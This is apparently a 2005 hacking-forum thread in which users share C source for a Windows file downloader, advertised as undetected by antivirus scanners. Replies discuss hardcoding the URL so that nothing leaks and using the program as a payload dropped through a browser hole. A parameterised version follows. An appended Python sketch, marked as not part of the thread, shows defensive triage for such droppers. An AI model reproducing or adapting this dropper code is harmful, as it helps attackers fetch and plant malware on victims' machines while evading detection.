apsync
Aug 8 2005, 11:20 AM
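here is a File Downloader, tested & compiled with lcc, scanned & undetected by all av's at virusscan.jotti.org
CODE
#include <stdio.h>
#include <windows.h>
#include <wininet.h>

int main()
{
    FILE *fp;
    HINTERNET hOpen, hURL;
    char file[99];
    unsigned long read;

    /* open a WinINet session using the system's configured proxy settings */
    hOpen = InternetOpen("WebReader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (hOpen == NULL)
        return 1;

    hURL = InternetOpenUrl(hOpen, "http://kisobox.com/files/putty.exe", NULL, 0, 0, 0);
    if (hURL == NULL) {
        InternetCloseHandle(hOpen);
        return 1;
    }

    fp = fopen("c:\\putty.exe", "wb");
    if (fp == NULL) {
        InternetCloseHandle(hURL);
        InternetCloseHandle(hOpen);
        return 1;
    }

    /* copy the response body to disk until InternetReadFile reports 0 bytes */
    while (InternetReadFile(hURL, file, sizeof(file) - 1, &read) && read != 0) {
        fwrite(file, sizeof(char), read, fp);
        file[read] = '\0';
    }

    fclose(fp);
    InternetCloseHandle(hURL);
    InternetCloseHandle(hOpen);
    return 0;
}
MSVC++ users don't forget to add #pragma comment (lib, "wininet.lib") and lcc users should compile with -lib wininet.lib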
fandango
Aug 8 2005, 01:07 PM
why not make the program way more useful by letting the user decide the url to download from and of course path and filename of the file to store? like this it's .. hmm greetz
apsync
Aug 8 2005, 01:21 PM
you put the file you want to download here ->
CODE
InternetOpenUrl( hOpen, "http://kisobox.com/files/putty.exe", NULL, 0, 0, 0 );
and this is where you want to download to
CODE
fp = fopen("c:\\putty.exe", "wb");
tibbar
Aug 8 2005, 02:06 PM
no flaming guys. let's keep posting informative.
if you start your main function as:
int main( int argc, char* argv[] )
you can then make this "dynamic", by picking up argv[1], argv[2], which could contain webaddress, filename respectively.
Matt
Aug 8 2005, 02:08 PM
QUOTE(fandango @ Aug 8 2005, 08:27 AM)
hm programs should be 'dynamic' - whether it's a simple app like this or a more 'advanced' one ... hardcoded this app is not very useful whatever my 2c .. greetz

I actually think this program is more useful because it does not require any user direct input. So it could be set up to run without leaking any info, like what is being downloaded.. Contrary to an exe with switches..
example : downloader.exe / file=hxxp://www.whatever.com/file.exe
I'd rather have fully hidden parameters !
tibbar
Aug 8 2005, 02:23 PM
QUOTE(Matt @ Aug 8 2005, 02:08 PM)
QUOTE(fandango @ Aug 8 2005, 08:27 AM)
hm programs should be 'dynamic' - whether its a simple app like this or a more 'advanced' one ... hardcoded this app is not very useful whatever my 2c .. greetz
I actually think this program is more useful because it does not require any user direct input. So it could be setup to run without leaking any info, like what is being downloaded.. Contrary to an exe with switches..
example : downloader.exe / file=hxxp://www.whatever.com/file.exe
I'd rather have fully hidden parameters !

i disagree. for instance if this exe was a payload in say an iexplorer hole, then would a skiddie want the actual webaddress embedded in the downloader? probably not, as it would leave evidence on the infected pc. instead they would opt to use a generic downloader and pass it the required parameters.
in any case, we are not here to argue about tiny details. it's nice to see people posting their code, so keep criticisms constructive and don't get upset if someone suggests an improvement.
apsync
Aug 8 2005, 03:13 PM
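anyway, parameter supported version
usage this.exe www.google.com/file.exe c:\saved.exe
CODE
#include <stdio.h>
#include <windows.h>
#include <wininet.h>

#pragma comment (lib, "wininet.lib")

int main(int argc, char* argv[])
{
    FILE *fp;
    HINTERNET hOpen, hURL;
    char file[99];
    unsigned long read;

    if (argc != 3) {
        printf("usage file.exe <url> <save to>\n");
        return 1;
    }

    /* open a WinINet session using the system's configured proxy settings */
    hOpen = InternetOpen("WebReader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (hOpen == NULL)
        return 1;

    /* argv[1] is the url, argv[2] is the local file to save to */
    hURL = InternetOpenUrl(hOpen, argv[1], NULL, 0, 0, 0);
    if (hURL == NULL) {
        InternetCloseHandle(hOpen);
        return 1;
    }

    fp = fopen(argv[2], "wb");
    if (fp == NULL) {
        InternetCloseHandle(hURL);
        InternetCloseHandle(hOpen);
        return 1;
    }

    while (InternetReadFile(hURL, file, sizeof(file) - 1, &read) && read != 0) {
        fwrite(file, sizeof(char), read, fp);
        file[read] = '\0';
    }

    fclose(fp);
    InternetCloseHandle(hURL);
    InternetCloseHandle(hOpen);
    return 0;
}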
Good work, I'd modify two versions, one that you could use to embed the addresses in and use it as a payload and another one that you could use dynamically, by specifying the local and remote file addresses.
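Added example, not part of any post in this thread: both designs argued over above leave an artifact a responder can recover, the embedded URL in the file's bytes for the hardcoded build and the URL on the logged process command line for the parameterized one. This Python sketch triages both; the sample bytes and command lines are constructed from values quoted in the thread, and the function names are hypothetical.

```python
import re

# Export-name prefixes of the WinINet calls used in the thread's code; they
# appear as plain ASCII in a PE import table (covers the A and W variants).
WININET_APIS = (b"InternetOpenUrl", b"InternetReadFile")
URL_BYTES = re.compile(rb"(?:https?|hxxps?)://[\x21-\x7e]{4,}", re.I)
# Scheme is optional: the thread's usage line passes "www.google.com/file.exe".
URL_ARG = re.compile(r"(?:(?:https?|hxxps?)://)?(?:[\w-]+\.)+[a-z]{2,}/\S+", re.I)


def triage_binary(data: bytes) -> dict:
    """Report embedded URLs and WinINet import names found in raw file bytes."""
    urls = sorted({m.group().decode("ascii") for m in URL_BYTES.finditer(data)})
    apis = [a.decode("ascii") for a in WININET_APIS if a in data]
    return {
        "urls": urls,
        "apis": apis,
        # Opens a URL and reads the body: the download pattern in the thread.
        "downloader_imports": len(apis) == len(WININET_APIS),
    }


def triage_cmdline(cmdline: str) -> list:
    """Return URL-like arguments from one logged process command line."""
    hits = []
    for arg in cmdline.split()[1:]:  # skip the image name
        # Accept both a bare URL argument and a key=URL style switch.
        candidates = (arg, arg.split("=", 1)[-1])
        if any(URL_ARG.fullmatch(c) for c in candidates):
            hits.append(arg)
    return hits


# Constructed samples (not real files or logs), built from values in the thread.
IMPORTS = b"\x00WININET.dll\x00InternetOpenA\x00InternetOpenUrlA\x00InternetReadFile\x00"
HARDCODED = b"MZ\x90\x00" + IMPORTS + b"http://kisobox.com/files/putty.exe\x00c:\\putty.exe\x00"
PARAMETERIZED = b"MZ\x90\x00" + IMPORTS + b"usage file.exe <url> <save to>\n\x00"
CMDLINES = [
    r"this.exe www.google.com/file.exe c:\saved.exe",
    "downloader.exe / file=hxxp://www.whatever.com/file.exe",
]

if __name__ == "__main__":
    for name, blob in (("hardcoded", HARDCODED), ("parameterized", PARAMETERIZED)):
        print(name, triage_binary(blob))
    for line in CMDLINES:
        print(line, "->", triage_cmdline(line))
```

The parameterized sample yields no embedded URL but still shows the import pair, so the command-line log is where its destination has to be recovered.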
chris105
Aug 12 2005, 12:32 AM
Sorry I have been away so haven't been able to act, someone reported this thread to me and I would just like to ask everyone to keep the comments constructive and also say that as long as criticism is constructive then the author must face up to the fact changes need to be made.
nolimit
Aug 12 2005, 12:33 AM
Doesn't really matter here that much but there is a single function that does this entire thing, in urlmon.dll